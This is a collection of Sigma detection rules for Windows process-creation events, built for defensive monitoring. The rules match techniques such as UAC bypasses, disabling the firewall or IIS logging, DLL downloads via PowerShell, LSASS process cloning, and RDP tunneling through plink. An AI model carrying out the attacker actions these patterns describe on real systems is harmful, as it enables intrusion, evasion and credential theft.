ParentImage|endswith:
- \EQNEDT32.EXE
- \EXCEL.EXE
- \MSACCESS.EXE
- \MSPUB.exe
- \ONENOTE.EXE
- \POWERPNT.exe
- \VISIO.exe
- \WINWORD.EXE
- \wordpad.exe
- \wordview.exe
Potentially Suspicious Office Document Executed From Trusted Location
- source: sigma
- technicques:
- t1202
Description
Detects the execution of an Office application that points to a document that is located in a trusted location. Attackers often used this to avoid macro security and execute their malicious code.
Detection logic
condition: all of selection_* and not 1 of filter_main_*
filter_main_dotx:
CommandLine|endswith:
- .dotx
- .xltx
- .potx
selection_img:
- Image|endswith:
- \EXCEL.EXE
- \POWERPNT.EXE
- \WINWORD.exe
- OriginalFileName:
- Excel.exe
- POWERPNT.EXE
- WinWord.exe
selection_parent:
ParentImage|endswith:
- \explorer.exe
- \dopus.exe
selection_trusted_location:
CommandLine|contains:
- \AppData\Roaming\Microsoft\Templates
- \AppData\Roaming\Microsoft\Word\Startup\
- \Microsoft Office\root\Templates\
- \Microsoft Office\Templates\
Potential DLL File Download Via PowerShell Invoke-WebRequest
- source: sigma
- technicques:
- t1059
- t1059.001
- t1105
Description
Detects potential DLL files being downloaded using the PowerShell Invoke-WebRequest cmdlet
Detection logic
condition: selection
selection:
CommandLine|contains:
- 'Invoke-WebRequest '
- 'IWR '
CommandLine|contains|all:
- http
- OutFile
- .dll
UAC Bypass Using Event Viewer RecentViews
- source: sigma
- technicques:
Description
Detects the pattern of UAC Bypass using Event Viewer RecentViews
Detection logic
condition: all of selection_*
selection_path:
CommandLine|contains:
- \Event Viewer\RecentViews
- \EventV~1\RecentViews
selection_redirect:
CommandLine|contains: '>'
Schtasks From Suspicious Folders
- source: sigma
- technicques:
- t1053
- t1053.005
Description
Detects scheduled task creations that have suspicious action command and folder combinations
Detection logic
condition: all of selection_*
selection_all_folders:
CommandLine|contains:
- C:\ProgramData\
- '%ProgramData%'
selection_command:
CommandLine|contains:
- powershell
- pwsh
- 'cmd /c '
- 'cmd /k '
- 'cmd /r '
- 'cmd.exe /c '
- 'cmd.exe /k '
- 'cmd.exe /r '
selection_create:
CommandLine|contains: ' /create '
selection_img:
- Image|endswith: \schtasks.exe
- OriginalFileName: schtasks.exe
Potential Binary Impersonating Sysinternals Tools
- source: sigma
- technicques:
- t1202
- t1218
Description
Detects binaries that use the same name as legitimate sysinternals tools to evade detection
Detection logic
condition: selection_exe and not 1 of filter*
filter_empty:
Company: null
filter_valid:
Company:
- Sysinternals - www.sysinternals.com
- Sysinternals
selection_exe:
Image|endswith:
- \accesschk.exe
- \accesschk64.exe
- \AccessEnum.exe
- \ADExplorer.exe
- \ADExplorer64.exe
- \ADInsight.exe
- \ADInsight64.exe
- \adrestore.exe
- \adrestore64.exe
- \Autologon.exe
- \Autologon64.exe
- \Autoruns.exe
- \Autoruns64.exe
- \autorunsc.exe
- \autorunsc64.exe
- \Bginfo.exe
- \Bginfo64.exe
- \Cacheset.exe
- \Cacheset64.exe
- \Clockres.exe
- \Clockres64.exe
- \Contig.exe
- \Contig64.exe
- \Coreinfo.exe
- \Coreinfo64.exe
- \CPUSTRES.EXE
- \CPUSTRES64.EXE
- \ctrl2cap.exe
- \Dbgview.exe
- \dbgview64.exe
- \Desktops.exe
- \Desktops64.exe
- \disk2vhd.exe
- \disk2vhd64.exe
- \diskext.exe
- \diskext64.exe
- \Diskmon.exe
- \Diskmon64.exe
- \DiskView.exe
- \DiskView64.exe
- \du.exe
- \du64.exe
- \efsdump.exe
- \FindLinks.exe
- \FindLinks64.exe
- \handle.exe
- \handle64.exe
- \hex2dec.exe
- \hex2dec64.exe
- \junction.exe
- \junction64.exe
- \ldmdump.exe
- \listdlls.exe
- \listdlls64.exe
- \livekd.exe
- \livekd64.exe
- \loadOrd.exe
- \loadOrd64.exe
- \loadOrdC.exe
- \loadOrdC64.exe
- \logonsessions.exe
- \logonsessions64.exe
- \movefile.exe
- \movefile64.exe
- \notmyfault.exe
- \notmyfault64.exe
- \notmyfaultc.exe
- \notmyfaultc64.exe
- \ntfsinfo.exe
- \ntfsinfo64.exe
- \pendmoves.exe
- \pendmoves64.exe
- \pipelist.exe
- \pipelist64.exe
- \portmon.exe
- \procdump.exe
- \procdump64.exe
- \procexp.exe
- \procexp64.exe
- \Procmon.exe
- \Procmon64.exe
- \psExec.exe
- \psExec64.exe
- \psfile.exe
- \psfile64.exe
- \psGetsid.exe
- \psGetsid64.exe
- \psInfo.exe
- \psInfo64.exe
- \pskill.exe
- \pskill64.exe
- \pslist.exe
- \pslist64.exe
- \psLoggedon.exe
- \psLoggedon64.exe
- \psloglist.exe
- \psloglist64.exe
- \pspasswd.exe
- \pspasswd64.exe
- \psping.exe
- \psping64.exe
- \psService.exe
- \psService64.exe
- \psshutdown.exe
- \psshutdown64.exe
- \pssuspend.exe
- \pssuspend64.exe
- \RAMMap.exe
- \RDCMan.exe
- \RegDelNull.exe
- \RegDelNull64.exe
- \regjump.exe
- \ru.exe
- \ru64.exe
- \sdelete.exe
- \sdelete64.exe
- \ShareEnum.exe
- \ShareEnum64.exe
- \shellRunas.exe
- \sigcheck.exe
- \sigcheck64.exe
- \streams.exe
- \streams64.exe
- \strings.exe
- \strings64.exe
- \sync.exe
- \sync64.exe
- \Sysmon.exe
- \Sysmon64.exe
- \tcpvcon.exe
- \tcpvcon64.exe
- \tcpview.exe
- \tcpview64.exe
- \Testlimit.exe
- \Testlimit64.exe
- \vmmap.exe
- \vmmap64.exe
- \Volumeid.exe
- \Volumeid64.exe
- \whois.exe
- \whois64.exe
- \Winobj.exe
- \Winobj64.exe
- \ZoomIt.exe
- \ZoomIt64.exe
Suspicious Execution Location Of Wermgr.EXE
- source: sigma
- technicques:
Description
Detects suspicious Windows Error Reporting manager (wermgr.exe) execution location.
Detection logic
condition: selection and not 1 of filter_main_*
filter_main_legit_location:
Image|startswith:
- C:\Windows\System32\
- C:\Windows\SysWOW64\
- C:\Windows\WinSxS\
selection:
Image|endswith: \wermgr.exe
NtdllPipe Like Activity Execution
- source: sigma
- technicques:
Description
Detects command that type the content of ntdll.dll to a different file or a pipe in order to evade AV / EDR detection. As seen being used in the POC NtdllPipe
Detection logic
condition: selection
selection:
CommandLine|contains:
- type %windir%\system32\ntdll.dll
- type %systemroot%\system32\ntdll.dll
- type c:\windows\system32\ntdll.dll
- \\ntdll.dll > \\\\.\\pipe\\
Suspicious Execution of Shutdown to Log Out
- source: sigma
- technicques:
- t1529
Description
Detects the rare use of the command line tool shutdown to logoff a user
Detection logic
condition: selection
selection:
CommandLine|contains: /l
Image|endswith: \shutdown.exe
Windows Firewall Disabled via PowerShell
- source: sigma
- technicques:
- t1562
Description
Detects attempts to disable the Windows Firewall using PowerShell
Detection logic
condition: all of selection_*
selection_args:
CommandLine|contains|all:
- 'Set-NetFirewallProfile '
- ' -Enabled '
- ' False'
selection_name:
- Image|endswith:
- \powershell.exe
- \pwsh.exe
- \powershell_ise.exe
- OriginalFileName:
- PowerShell.EXE
- pwsh.dll
selection_opt:
CommandLine|contains:
- ' -All '
- Public
- Domain
- Private
Writing Of Malicious Files To The Fonts Folder
- source: sigma
- technicques:
- t1059
- t1211
Description
Monitors for the hiding possible malicious files in the C:\Windows\Fonts\ location. This folder doesn’t require admin privillege to be written and executed from.
Detection logic
condition: all of selection_*
selection_1:
CommandLine|contains:
- echo
- copy
- type
- file createnew
- cacls
selection_2:
CommandLine|contains: C:\Windows\Fonts\
selection_3:
CommandLine|contains:
- .sh
- .exe
- .dll
- .bin
- .bat
- .cmd
- .js
- .msh
- .reg
- .scr
- .ps
- .vb
- .jar
- .pl
- '.inf'
- .cpl
- .hta
- .msi
- .vbs
Change Default File Association To Executable Via Assoc
- source: sigma
- technicques:
- t1546
- t1546.001
Description
Detects when a program changes the default file association of any extension to an executable. When a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access or by administrators using the built-in assoc utility. Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened.
Detection logic
condition: all of selection_* and not filter
filter:
CommandLine|contains: .exe=exefile
selection_cli:
CommandLine|contains|all:
- 'assoc '
- exefile
selection_img:
- Image|endswith: \cmd.exe
- OriginalFileName: Cmd.Exe
UAC Bypass via ICMLuaUtil
- source: sigma
- technicques:
- t1548
- t1548.002
Description
Detects the pattern of UAC Bypass using ICMLuaUtil Elevated COM interface
Detection logic
condition: selection and not filter
filter:
- Image|endswith: \WerFault.exe
- OriginalFileName: WerFault.exe
selection:
ParentCommandLine|contains:
- /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}
- /Processid:{D2E7041B-2927-42FB-8E9F-7CE93B6DC937}
ParentImage|endswith: \dllhost.exe
Folder Compress To Potentially Suspicious Output Via Compress-Archive Cmdlet
- source: sigma
- technicques:
- t1074
- t1074.001
Description
Detects PowerShell scripts that make use of the “Compress-Archive” Cmdlet in order to compress folders and files where the output is stored in a potentially suspicious location that is used often by malware for exfiltration. An adversary might compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network.
Detection logic
condition: selection
selection:
CommandLine|contains:
- Compress-Archive -Path*-DestinationPath $env:TEMP
- Compress-Archive -Path*-DestinationPath*\AppData\Local\Temp\
- Compress-Archive -Path*-DestinationPath*:\Windows\Temp\
Suspicious Binary In User Directory Spawned From Office Application
- source: sigma
- technicques:
- t1204
- t1204.002
Description
Detects an executable in the users directory started from one of the Microsoft Office suite applications (Word, Excel, PowerPoint, Publisher, Visio)
Detection logic
condition: selection and not filter
filter:
Image|endswith: \Teams.exe
selection:
Image|endswith: .exe
Image|startswith: C:\users\
ParentImage|endswith:
- \WINWORD.EXE
- \EXCEL.EXE
- \POWERPNT.exe
- \MSPUB.exe
- \VISIO.exe
- \MSACCESS.exe
- \EQNEDT32.exe
Potential PowerShell Downgrade Attack
- source: sigma
- technicques:
- t1059
- t1059.001
Description
Detects PowerShell downgrade attack by comparing the host versions with the actually used engine version 2.0
Detection logic
condition: selection
selection:
CommandLine|contains:
- ' -version 2 '
- ' -versio 2 '
- ' -versi 2 '
- ' -vers 2 '
- ' -ver 2 '
- ' -ve 2 '
- ' -v 2 '
Image|endswith: \powershell.exe
Potential Arbitrary DLL Load Using Winword
- source: sigma
- technicques:
- t1202
Description
Detects potential DLL sideloading using the Microsoft Office winword process via the ‘/l’ flag.
Detection logic
condition: all of selection_*
selection_dll:
CommandLine|contains|all:
- '/l '
- .dll
selection_img:
- Image|endswith: \WINWORD.exe
- OriginalFileName: WinWord.exe
Allow Service Access Using Security Descriptor Tampering Via Sc.EXE
- source: sigma
- technicques:
- t1543
- t1543.003
Description
Detects suspicious DACL modifications to allow access to a service from a suspicious trustee. This can be used to override access restrictions set by previous ACLs.
Detection logic
condition: all of selection_*
selection_sc:
- Image|endswith: \sc.exe
- OriginalFileName: sc.exe
selection_sdset:
CommandLine|contains|all:
- sdset
- A;
selection_trustee:
CommandLine|contains:
- ;IU
- ;SU
- ;BA
- ;SY
- ;WD
Active Directory Database Snapshot Via ADExplorer
- source: sigma
- technicques:
- t1003
- t1003.003
- t1552
- t1552.001
Description
Detects the execution of Sysinternals ADExplorer with the “-snapshot” flag in order to save a local copy of the active directory database.
Detection logic
condition: all of selection_*
selection_cli:
CommandLine|contains: snapshot
selection_img:
- Image|endswith: \ADExplorer.exe
- OriginalFileName: AdExp
Uncommon Extension Shim Database Installation Via Sdbinst.EXE
- source: sigma
- technicques:
- t1546
- t1546.011
Description
Detects installation of a potentially suspicious new shim with an uncommon extension using sdbinst.exe. Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims
Detection logic
condition: selection and not 1 of filter_main_*
filter_main_empty:
CommandLine: ''
filter_main_legit_ext:
CommandLine|contains: .sdb
filter_main_null:
CommandLine: null
filter_main_svchost:
- CommandLine|endswith:
- ' -c'
- ' -f'
- ' -mm'
- ' -t'
- CommandLine|contains: ' -m -bg'
selection:
- Image|endswith: \sdbinst.exe
- OriginalFileName: sdbinst.exe
Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION
- source: sigma
- technicques:
- t1027
- t1059
- t1059.001
Description
Detects Obfuscated Powershell via VAR++ LAUNCHER
Detection logic
condition: selection
selection:
CommandLine|contains:
- '{0}'
- '{1}'
- '{2}'
- '{3}'
- '{4}'
- '{5}'
CommandLine|contains|all:
- '&&set'
- cmd
- /c
- -f
Suspicious Splwow64 Without Params
- source: sigma
- technicques:
- t1202
Description
Detects suspicious Splwow64.exe process without any command line parameters
Detection logic
condition: selection
selection:
CommandLine|endswith: splwow64.exe
Image|endswith: \splwow64.exe
Execution of Suspicious File Type Extension
- source: sigma
- technicques:
Description
Detects whether the image specified in a process creation event doesn’t refer to an “.exe” (or other known executable extension) file. This can be caused by process ghosting or other unorthodox methods to start a process. This rule might require some initial baselining to align with some third party tooling in the user environment.
Detection logic
condition: not known_image_extension and not 1 of filter_main_* and not 1 of filter_optional_*
filter_main_deleted:
Image|contains: :\$Extend\$Deleted\
filter_main_driver_store:
Image|contains: :\Windows\System32\DriverStore\FileRepository\
filter_main_empty:
Image:
- '-'
- ''
filter_main_image:
Image:
- System
- Registry
- MemCompression
- vmmem
filter_main_msi_installers:
Image|contains: :\Windows\Installer\MSI
filter_main_msi_rollbackfiles:
Image|contains: :\Config.Msi\
Image|endswith:
- .rbf
- .rbs
filter_main_null:
Image: null
filter_main_windows_temp:
- ParentImage|contains: :\Windows\Temp\
- Image|contains: :\Windows\Temp\
filter_optional_avira:
ParentImage|contains: :\ProgramData\Avira\
filter_optional_docker:
Image|endswith: com.docker.service
ParentImage: C:\Windows\System32\services.exe
filter_optional_firefox:
Image|contains: :\Program Files\Mozilla Firefox\
filter_optional_lzma_exe:
Image|endswith: \LZMA_EXE
filter_optional_myq_server:
Image|endswith:
- :\Program Files (x86)\MyQ\Server\pcltool.dll
- :\Program Files\MyQ\Server\pcltool.dll
filter_optional_nvidia:
Image|contains: NVIDIA\NvBackend\
Image|endswith: .dat
filter_optional_winpakpro:
Image|contains:
- :\Program Files (x86)\WINPAKPRO\
- :\Program Files\WINPAKPRO\
Image|endswith: .ngn
filter_optional_wsl:
Image|contains|all:
- \AppData\Local\Packages\
- \LocalState\rootfs\
known_image_extension:
Image|endswith:
- .bin
- .cgi
- .com
- .exe
- .scr
- .tmp
File Download And Execution Via IEExec.EXE
- source: sigma
- technicques:
- t1105
Description
Detects execution of the IEExec utility to download and execute files
Detection logic
condition: all of selection_*
selection_cli:
CommandLine|contains:
- http://
- https://
selection_img:
- Image|endswith: \IEExec.exe
- OriginalFileName: IEExec.exe
AddinUtil.EXE Execution From Uncommon Directory
- source: sigma
- technicques:
- t1218
Description
Detects execution of the Add-In deployment cache updating utility (AddInutil.exe) from a non-standard directory.
Detection logic
condition: selection and not 1 of filter_main_*
filter_main_legit_location:
Image|contains:
- :\Windows\Microsoft.NET\Framework\
- :\Windows\Microsoft.NET\Framework64\
- :\Windows\WinSxS\
selection:
- Image|endswith: \addinutil.exe
- OriginalFileName: AddInUtil.exe
File Encryption Using Gpg4win
- source: sigma
- technicques:
Description
Detects usage of Gpg4win to encrypt files
Detection logic
condition: all of selection_*
selection_cli:
CommandLine|contains|all:
- ' -c '
- passphrase
selection_metadata:
- Image|endswith:
- \gpg.exe
- \gpg2.exe
- Description: "GnuPG\u2019s OpenPGP tool"
HackTool - F-Secure C3 Load by Rundll32
- source: sigma
- technicques:
- t1218
- t1218.011
Description
F-Secure C3 produces DLLs with a default exported StartNodeRelay function.
Detection logic
condition: selection
selection:
CommandLine|contains|all:
- rundll32.exe
- .dll
- StartNodeRelay
ImagingDevices Unusual Parent/Child Processes
- source: sigma
- technicques:
Description
Detects unusual parent or children of the ImagingDevices.exe (Windows Contacts) process as seen being used with Bumblebee activity
Detection logic
condition: 1 of selection_*
selection_child:
ParentImage|endswith: \ImagingDevices.exe
selection_parent:
Image|endswith: \ImagingDevices.exe
ParentImage|endswith:
- \WmiPrvSE.exe
- \svchost.exe
- \dllhost.exe
Disable Windows IIS HTTP Logging
- source: sigma
- technicques:
- t1562
- t1562.002
Description
Disables HTTP logging on a Windows IIS web server as seen by Threat Group 3390 (Bronze Union)
Detection logic
condition: all of selection_*
selection_cli:
CommandLine|contains|all:
- set
- config
- section:httplogging
- dontLog:true
selection_img:
- Image|endswith: \appcmd.exe
- OriginalFileName: appcmd.exe
Potential Credential Dumping Via LSASS Process Clone
- source: sigma
- technicques:
- t1003
- t1003.001
Description
Detects a suspicious LSASS process process clone that could be a sign of credential dumping activity
Detection logic
condition: selection
selection:
Image|endswith: \Windows\System32\lsass.exe
ParentImage|endswith: \Windows\System32\lsass.exe
File Download From IP Based URL Via CertOC.EXE
- source: sigma
- technicques:
- t1105
Description
Detects when a user downloads a file from an IP based URL using CertOC.exe
Detection logic
condition: all of selection*
selection_cli:
CommandLine|contains: -GetCACAPS
selection_img:
- Image|endswith: \certoc.exe
- OriginalFileName: CertOC.exe
selection_ip:
CommandLine|re: ://[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}
Potential RDP Tunneling Via Plink
- source: sigma
- technicques:
- t1572
Description
Execution of plink to perform data exfiltration and tunneling
Detection logic
condition: selection_a or all of selection_b*
selection_a:
CommandLine|contains: :127.0.0.1:3389
Image|endswith: \plink.exe
selection_b1:
CommandLine|contains: :3389
Image|endswith: \plink.exe
selection_b2:
CommandLine|contains:
- ' -P 443'
- ' -P 22'
Renamed Remote Utilities RAT (RURAT) Execution
- source: sigma
- technicques:
Description
Detects execution of renamed Remote Utilities (RURAT) via Product PE header field
Detection logic
condition: selection and not filter
filter:
Image|endswith:
- \rutserv.exe
- \rfusclient.exe
selection:
Product: Remote Utilities
Potentially Suspicious WebDAV LNK Execution
- source: sigma
- technicques:
- t1059
- t1059.001
- t1204
Description
Detects possible execution via LNK file accessed on a WebDAV server.
Detection logic
condition: selection
selection:
CommandLine|contains: \DavWWWRoot\
Image|endswith:
- \cmd.exe
- \cscript.exe
- \mshta.exe
- \powershell.exe
- \pwsh.exe
- \wscript.exe
ParentImage|endswith: \explorer.exe
Service Started/Stopped Via Wmic.EXE
- source: sigma
- technicques:
- t1047
Description
Detects usage of wmic to start or stop a service
Detection logic
condition: all of selection_*
selection_cli:
CommandLine|contains:
- stopservice
- startservice
CommandLine|contains|all:
- ' service '
- ' call '
selection_img:
- OriginalFileName: wmic.exe
- Image|endswith: \WMIC.exe
Set Suspicious Files as System Files Using Attrib.EXE
- source: sigma
- technicques:
- t1564
- t1564.001
Description
Detects the usage of attrib with the “+s” option to set scripts or executables located in suspicious locations as system files to hide them from users and make them unable to be deleted with simple rights. The rule limits the search to specific extensions and directories to avoid FPs
Detection logic
condition: all of selection* and not filter
filter:
CommandLine|contains|all:
- \Windows\TEMP\
- .exe
selection_cli:
CommandLine|contains: ' +s'
selection_ext:
CommandLine|contains:
- .bat
- .dll
- .exe
- .hta
- .ps1
- .vbe
- .vbs
selection_img:
- Image|endswith: \attrib.exe
- OriginalFileName: ATTRIB.EXE
selection_paths:
CommandLine|contains:
- ' %'
- \Users\Public\
- \AppData\Local\
- \ProgramData\
- \Downloads\
- \Windows\Temp\
Suspicious Child Process Created as System
- source: sigma
- technicques:
- t1134
- t1134.002
Description
Detection of child processes spawned with SYSTEM privileges by parents with LOCAL SERVICE or NETWORK SERVICE accounts
Detection logic
condition: selection and not 1 of filter_*
filter_rundll32:
CommandLine|contains: DavSetCookie
Image|endswith: \rundll32.exe
selection:
IntegrityLevel: System
ParentUser|contains:
- AUTHORI
- AUTORI
ParentUser|endswith:
- \NETWORK SERVICE
- \LOCAL SERVICE
User|contains:
- AUTHORI
- AUTORI
User|endswith:
- \SYSTEM
- "\\Syst\xE8me"
- "\\\u0421\u0418\u0421\u0422\u0415\u041C\u0410"
Csc.EXE Execution Form Potentially Suspicious Parent
- source: sigma
- technicques:
- t1027
- t1027.004
- t1059
- t1059.005
- t1059.007
- t1218
- t1218.005
Description
Detects a potentially suspicious parent of “csc.exe”, which could be a sign of payload delivery.
Detection logic
condition: selection_img and 1 of selection_parent_* and not 1 of filter_main_* and
not 1 of filter_optional_*
filter_main_programfiles:
ParentImage|startswith:
- C:\Program Files (x86)\
- C:\Program Files\
filter_main_sdiagnhost:
ParentImage: C:\Windows\System32\sdiagnhost.exe
filter_main_w3p:
ParentImage: C:\Windows\System32\inetsrv\w3wp.exe
filter_optional_ansible:
ParentCommandLine|contains:
- JwB7ACIAZgBhAGkAbABlAGQAIgA6AHQAcgB1AGUALAAiAG0AcwBnACIAOgAiAEEAbgBzAGkAYgBsAGUAIAByAGUAcQB1AGkAcgBlAHMAIABQAG8AdwBlAHIAUwBoAGUAbABsACAAdgAzAC4AMAAgAG8AcgAgAG4AZQB3AGUAcgAiAH0AJw
- cAewAiAGYAYQBpAGwAZQBkACIAOgB0AHIAdQBlACwAIgBtAHMAZwAiADoAIgBBAG4AcwBpAGIAbABlACAAcgBlAHEAdQBpAHIAZQBzACAAUABvAHcAZQByAFMAaABlAGwAbAAgAHYAMwAuADAAIABvAHIAIABuAGUAdwBlAHIAIgB9ACcA
- nAHsAIgBmAGEAaQBsAGUAZAAiADoAdAByAHUAZQAsACIAbQBzAGcAIgA6ACIAQQBuAHMAaQBiAGwAZQAgAHIAZQBxAHUAaQByAGUAcwAgAFAAbwB3AGUAcgBTAGgAZQBsAGwAIAB2ADMALgAwACAAbwByACAAbgBlAHcAZQByACIAfQAnA
filter_optional_chocolatey:
ParentImage: C:\ProgramData\chocolatey\choco.exe
filter_optional_defender:
ParentCommandLine|contains: \ProgramData\Microsoft\Windows Defender Advanced Threat
Protection
selection_img:
- Image|endswith: \csc.exe
- OriginalFileName: csc.exe
selection_parent_generic:
ParentImage|endswith:
- \cscript.exe
- \excel.exe
- \mshta.exe
- \onenote.exe
- \outlook.exe
- \powerpnt.exe
- \winword.exe
- \wscript.exe
selection_parent_powershell:
ParentCommandLine|contains:
- '-Encoded '
- FromBase64String
ParentImage|endswith:
- \powershell.exe
- \pwsh.exe
selection_parent_susp_location:
- ParentCommandLine|re: ([Pp]rogram[Dd]ata|%([Ll]ocal)?[Aa]pp[Dd]ata%|\\[Aa]pp[Dd]ata\\([Ll]ocal(Ll]ow)?|[Rr]oaming))\\[^\\]{1,256}$
- ParentCommandLine|contains:
- :\PerfLogs\
- :\Users\Public\
- :\Windows\Temp\
- \Temporary Internet
- ParentCommandLine|contains|all:
- :\Users\
- \Favorites\
- ParentCommandLine|contains|all:
- :\Users\
- \Favourites\
- ParentCommandLine|contains|all:
- :\Users\
- \Contacts\
- ParentCommandLine|contains|all:
- :\Users\
- \Pictures\
Arbitrary File Download Via ConfigSecurityPolicy.EXE
- source: sigma
- technicques:
- t1567
Description
Detects the execution of “ConfigSecurityPolicy.EXE”, a binary part of Windows Defender used to manage settings in Windows Defender. Users can configure different pilot collections for each of the co-management workloads. It can be abused by attackers in order to upload or download files.
Detection logic
condition: all of selection_*
selection_img:
- CommandLine|contains: ConfigSecurityPolicy.exe
- Image|endswith: \ConfigSecurityPolicy.exe
- OriginalFileName: ConfigSecurityPolicy.exe
selection_url:
CommandLine|contains:
- ftp://
- http://
- https://
PUA - PingCastle Execution
- source: sigma
- technicques:
- t1595
Description
Detects the execution of PingCastle, a tool designed to quickly assess the Active Directory security level.
Detection logic
condition: selection
selection:
- Hashes|contains:
- MD5=f741f25ac909ee434e50812d436c73ff
- MD5=d40acbfc29ee24388262e3d8be16f622
- MD5=01bb2c16fadb992fa66228cd02d45c60
- MD5=9e1b18e62e42b5444fc55b51e640355b
- MD5=b7f8fe33ac471b074ca9e630ba0c7e79
- MD5=324579d717c9b9b8e71d0269d13f811f
- MD5=63257a1ddaf83cfa43fe24a3bc06c207
- MD5=049e85963826b059c9bac273bb9c82ab
- MD5=ecb98b7b4d4427eb8221381154ff4cb2
- MD5=faf87749ac790ec3a10dd069d10f9d63
- MD5=f296dba5d21ad18e6990b1992aea8f83
- MD5=93ba94355e794b6c6f98204cf39f7a11
- MD5=a258ef593ac63155523a461ecc73bdba
- MD5=97000eb5d1653f1140ee3f47186463c4
- MD5=95eb317fbbe14a82bd9fdf31c48b8d93
- MD5=32fe9f0d2630ac40ea29023920f20f49
- MD5=a05930dde939cfd02677fc18bb2b7df5
- MD5=124283924e86933ff9054a549d3a268b
- MD5=ceda6909b8573fdeb0351c6920225686
- MD5=60ce120040f2cd311c810ae6f6bbc182
- MD5=2f10cdc5b09100a260703a28eadd0ceb
- MD5=011d967028e797a4c16d547f7ba1463f
- MD5=2da9152c0970500c697c1c9b4a9e0360
- MD5=b5ba72034b8f44d431f55275bace9f8b
- MD5=d6ed9101df0f24e27ff92ddab42dacca
- MD5=3ed3cdb6d12aa1ac562ad185cdbf2d1d
- MD5=5e083cd0143ae95a6cb79b68c07ca573
- MD5=28caff93748cb84be70486e79f04c2df
- MD5=9d4f12c30f9b500f896efd1800e4dd11
- MD5=4586f7dd14271ad65a5fb696b393f4c0
- MD5=86ba9dddbdf49215145b5bcd081d4011
- MD5=9dce0a481343874ef9a36c9a825ef991
- MD5=85890f62e231ad964b1fda7a674747ec
- MD5=599be548da6441d7fe3e9a1bb8cb0833
- MD5=9b0c7fd5763f66e9b8c7b457fce53f96
- MD5=32d45718164205aec3e98e0223717d1d
- MD5=6ff5f373ee7f794cd17db50704d00ddb
- MD5=88efbdf41f0650f8f58a3053b0ca0459
- MD5=ef915f61f861d1fb7cbde9afd2e7bd93
- MD5=781fa16511a595757154b4304d2dd350
- MD5=5018ec39be0e296f4fc8c8575bfa8486
- MD5=f4a84d6f1caf0875b50135423d04139f
- SHA1=9c1431801fa6342ed68f047842b9a11778fc669b
- SHA1=c36c862f40dad78cb065197aad15fef690c262f2
- SHA1=bc8e23faea8b3c537f268b3e81d05b937012272d
- SHA1=12e0357658614ff60d480d1a6709be68a2e40c5f
- SHA1=18b33ab5719966393d424a3edbfa8dec225d98fa
- SHA1=f14c9633040897d375e3069fddc71e859f283778
- SHA1=08041b426c9f112ad2061bf3c8c718e34739d4fc
- SHA1=7be77c885d0c9a4af4cecc64d512987cf93ba937
- SHA1=72dbb719b05f89d9d2dbdf186714caf7639daa36
- SHA1=5b1498beb2cfb4d971e377801e7abce62c0e315b
- SHA1=292629c6ab33bddf123d26328025e2d157d9e8fc
- SHA1=be59e621e83a2d4c87b0e6c69a2d22f175408b11
- SHA1=0250ce9a716ab8cca1c70a9de4cbc49a51934995
- SHA1=607e1fa810c799735221a609af3bfc405728c02d
- SHA1=ab1c547f6d1c07a9e0a01e46adea3aae1cac12e3
- SHA1=044cf5698a8e6b0aeba5acb56567f06366a9a70a
- SHA1=ef2dea8c736d49607832986c6c2d6fdd68ba6491
- SHA1=efffc2bfb8af2e3242233db9a7109b903fc3f178
- SHA1=5a05d4320de9afbc84de8469dd02b3a109efb2d4
- SHA1=a785d88cf8b862a420b9be793ee6a9616aa94c84
- SHA1=5688d56cbaf0d934c4e37b112ba257e8fb63f4ea
- SHA1=5cd2ada1c26815fbfd6a0cd746d5d429c0d83a17
- SHA1=81d67b3d70c4e855cb11a453cc32997517708362
- SHA1=9cffce9de95e0109f4dfecce0ab2cb0a59cc58ad
- SHA1=09c6930d057f49c1c1e11cf9241fffc8c12df3a2
- SHA1=e27bf7db8d96db9d4c8a06ee5e9b8e9fcb86ac92
- SHA1=9e3c992415e390f9ada4d15c693b687f38a492d1
- SHA1=3f34a5ee303d37916584c888c4928e1c1164f92a
- SHA1=ea4c8c56a8f5c90a4c08366933e5fb2de611d0db
- SHA1=3150f14508ee4cae19cf09083499d1cda8426540
- SHA1=036ad9876fa552b1298c040e233d620ea44689c6
- SHA1=3a3c1dcb146bb4616904157344ce1a82cd173bf5
- SHA1=6230d6fca973fa26188dfbadede57afb4c15f75c
- SHA1=8f7b2a9b8842f339b1e33602b7f926ab65de1a4d
- SHA1=a586bb06b59a4736a47abff8423a54fe8e2c05c4
- SHA1=c82152cddf9e5df49094686531872ecd545976db
- SHA1=04c39ffc18533100aaa4f9c06baf2c719ac94a61
- SHA1=e082affa5cdb2d46452c6601a9e85acb8446b836
- SHA1=a075bfb6cf5c6451ce682197a87277c8bc188719
- SHA1=34c0c5839af1c92bce7562b91418443a2044c90d
- SHA1=74e10a9989e0ec8fe075537ac802bd3031ae7e08
- SHA1=3a515551814775df0ccbe09f219bc972eae45a10
- SHA256=90fd5b855b5107e7abaaefb6e658f50d5d6e08ac28e35f31d8b03dcabf77872b
- SHA256=5836c24f233f77342fee825f3cad73caab7ab4fb65ec2aec309fd12bc1317e85
- SHA256=e850e54b12331249c357a20604281b9abf8a91e6f3d957463fc625e6b126ef03
- SHA256=9e752f29edcd0db9931c20b173eee8d4d8196f87382c68a6e7eb4c8a44d58795
- SHA256=7a8c127d6c41f80d178d2315ed2f751ac91b1cd54d008af13680e04f068f426f
- SHA256=9f65e1c142c4f814e056a197a2241fd09e09acf245c62897109871137321a72a
- SHA256=c9b52d03c66d54d6391c643b3559184b1425c84a372081ec2bfed07ebf6af275
- SHA256=1b96f6218498aa6baf6f6c15b8f99e542077e33feb1ab5472bbbf7d4de43eb6b
- SHA256=768021fc242054decc280675750dec0a9e74e764b8646864c58756fa2386d2a2
- SHA256=1e1b32bef31be040f0f038fcb5a2d68fb192daaef23c6167f91793d21e06ebae
- SHA256=606bd75ed9d2d6107ea7ee67063d1761a99f2fb5e932c8344d11395d24587dd6
- SHA256=b489d3cdd158f040322ae5c8d0139ad28eff743c738a10f2d0255c7e149bd92a
- SHA256=ca7ecf04a8ad63aff330492c15270d56760cb223a607cdb1431fb00e1b9985d1
- SHA256=9dc4fca72463078b70f6516559a179c78400b06534e63ee12fb38adbe2632559
